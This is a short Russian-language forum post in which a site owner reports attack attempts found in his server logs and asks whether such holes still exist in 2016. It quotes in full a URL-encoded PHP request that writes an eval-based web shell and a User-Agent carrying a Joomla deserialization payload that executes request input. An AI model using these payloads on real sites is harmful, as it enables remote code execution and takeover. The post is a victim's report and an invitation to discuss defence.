Модераторам: если вы считаете этот топик слишком техническим — поумерьте в себе вахтёрский пыл и перенесите в веб-девелопмент; я не хочу обсуждать ничего технического тут, я просто в толксах посты писать пришёл; линукс тут при том, что на сервере линукс.
Такие дела: кто-то пытался сделать мне
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
и потом ещё
/administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
с вот таким вот юзерагентом
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:46:"eval($_REQUEST[1]);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";b:1;}\xf0\x9d\x8c\x86
Во-первых: опасносте, кто-то хакает интернеты. Урлы, на которые ломились кулхацкеры, публиковались только на ЛОРе, можно сделать вывод что кто-то хакает ЛОРовцев. Ну или меня лично, тогда опасносте нет.
Во-вторых: предлагаю обсудить это кулхацкерство.
В-третьих: в две тысячи шестнадцатом ещё бывают такие дырки в интернетах? Я думал что даже в похапе их уже много лет как позакрывали и научились больше не делать.